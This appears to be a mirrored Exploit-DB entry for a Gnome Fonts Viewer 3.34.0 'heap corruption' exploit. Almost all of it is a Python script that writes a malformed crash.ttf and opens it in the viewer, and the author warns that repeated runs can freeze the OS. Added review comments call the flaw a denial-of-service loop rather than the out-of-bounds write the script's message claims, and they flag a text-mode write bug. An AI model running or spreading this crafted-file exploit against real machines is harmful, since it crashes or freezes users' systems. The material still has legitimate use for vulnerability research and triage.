Gnome Fonts Viewer 3.34.0 – Heap Corruption

  • 作者: Cody Winkler
    日期: 2020-09-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/48803/
#!/usr/bin/env python3
# Exploit Title: Gnome Fonts Viewer 3.34.0 Heap Corruption
# Date: 2020-09-10
# Exploit Author: Cody Winkler
# Vendor Homepage: gnome.org
# Software Link: https://help.gnome.org/misc/release-notes/3.6/users-font-viewer.html
# Version: 3.34.0
# Tested On: Ubuntu 20.04.1 LTS
#
# Note: May take a few tries. Too many consecutive runs can freeze OS.
# This will trigger an infinite malloc() loop until gnome-font-viewer process is stopped.
#
# Overview: the script writes ./crash.ttf -- a fixed sfnt header/table-directory
# prefix followed by a long repeated filler -- and then opens it with
# gnome-font-viewer. The failure mode the author describes (an unbounded
# malloc() loop until the process is stopped) is a resource-exhaustion /
# denial-of-service condition in the viewer, not a demonstrated code-execution
# primitive; the "out-of-bounds write" wording in the final message is the
# author's, and nothing in this script confirms it.

from os import system

# Filler appended after the header. 4 * 21125 == 84500 characters, which the
# author says is roughly the length the file needs to reach.
fill_pattern = "BEEF" * 21125

# Prefix taken from "MesloLGS NF Regular.ttf" (the author notes it probably
# carries some junk). The first 12 bytes decode as an sfnt offset table
# (version 0x00010000, numTables 0x13 = 19, searchRange 0x100, entrySelector 4,
# rangeShift 0x30); the 19 tag/checksum/offset/length records follow, and the
# tail presumably begins the first table body.
#
# NOTE(review): crash.ttf is opened in *text* mode below, so escapes >= \x80 in
# this literal go through the locale codec instead of being written as single
# raw bytes; the on-disk file therefore need not match the MesloLGS header
# byte-for-byte. Left exactly as published -- confirm against the original
# before relying on the header contents for triage.
sfnt_prefix = (
    "\x00\x01\x00\x00\x00\x13\x01\x00\x00\x04\x00\x30\x46\x46\x54"
    "\x4d\x75\xfe\x73\xdd\x00\x13\xb6\x0c\x00\x00\x00\x1c\x47\x44\x45"
    "\x46\x4d\x76\x5d\xda\x00\x13\xb0\xac\x00\x00\x04\xaa\x47\x50\x4f"
    "\x53\x44\x76\x4c\x75\x00\x13\xb5\xec\x00\x00\x00\x20\x47\x53\x55"
    "\x42\x09\xf6\x0b\xdc\x00\x13\xb5\x58\x00\x00\x00\x92\x4f\x53\x2f"
    "\x32\x8d\xbd\x8e\x75\x00\x00\x01\xb8\x00\x00\x00\x60\x50\x66\x45"
    "\x64\x5b\xd3\xe9\x6b\x00\x13\xb6\x28\x00\x00\x02\x50\x63\x6d\x61"
    "\x70\xbf\x0d\x76\x7c\x00\x00\x34\x30\x00\x00\x0a\x36\x63\x76\x74"
    "\x20\x28\xfd\x02\x16\x00\x00\x48\x98\x00\x00\x00\x38\x66\x70\x67"
    "\x6d\x31\xfc\xa0\x95\x00\x00\x3e\x68\x00\x00\x09\x96\x67\x61\x73"
    "\x70\xff\xff\x00\x10\x00\x13\xb0\xa4\x00\x00\x00\x08\x67\x6c\x79"
    "\x66\xd6\x2f\x24\x7c\x00\x00\xac\xf0\x00\x11\xd8\x34\x68\x65\x61"
    "\x64\x04\xe3\x81\x66\x00\x00\x01\x3c\x00\x00\x00\x36\x68\x68\x65"
    "\x61\x0a\xf4\x01\xa2\x00\x00\x01\x74\x00\x00\x00\x24\x68\x6d\x74"
    "\x78\x93\xdf\x7e\x92\x00\x00\x02\x18\x00\x00\x32\x16\x6c\x6f\x63"
    "\x61\xe6\x44\x45\x24\x00\x00\x48\xd0\x00\x00\x64\x20\x6d\x61\x78"
    "\x70\x1a\xa2\x0b\x9c\x00\x00\x01\x98\x00\x00\x00\x20\x6e\x61\x6d"
    "\x65\x62\x13\x17\xa4\x00\x12\x85\x24\x00\x00\x0b\x9d\x70\x6f\x73"
    "\x74\xbb\xe8\x29\xcf\x00\x12\x90\xc4\x00\x01\x1f\xdd\x70\x72\x65"
    "\x70\xb4\xc5\xc5\x72\x00\x00\x48\x00\x00\x00\x00\x95\x00\x01\x00"
    "\x00\x00\x02\x07\x2b\xd0\x81\xfc\x0f\x5f\x0f\x3c\xf5\x02\x9f\x08"
    "\x00\x00\x00\x00\x00\xc5\x74\x19\x33\x00\x00\x00\x00\xda\x9d\x14"
    "\xf1\xfd\x41\xfc\xfc\x05\xdf\x0a"
)

print('[+] Generating crash.ttf with DEADDEAD')

# Same file contents as two consecutive writes; the context manager closes the
# handle on exit, so no explicit close() is needed.
with open("./crash.ttf", 'w') as crash_file:
    crash_file.write(sfnt_prefix + fill_pattern)
print('[+] Done')

# Hands the generated file to the viewer via the shell; the command is a fixed
# literal with no interpolated input.
print('[+] Triggering out-of-bounds write in gnome-font-viewer')
system("/usr/bin/gnome-font-viewer ./crash.ttf")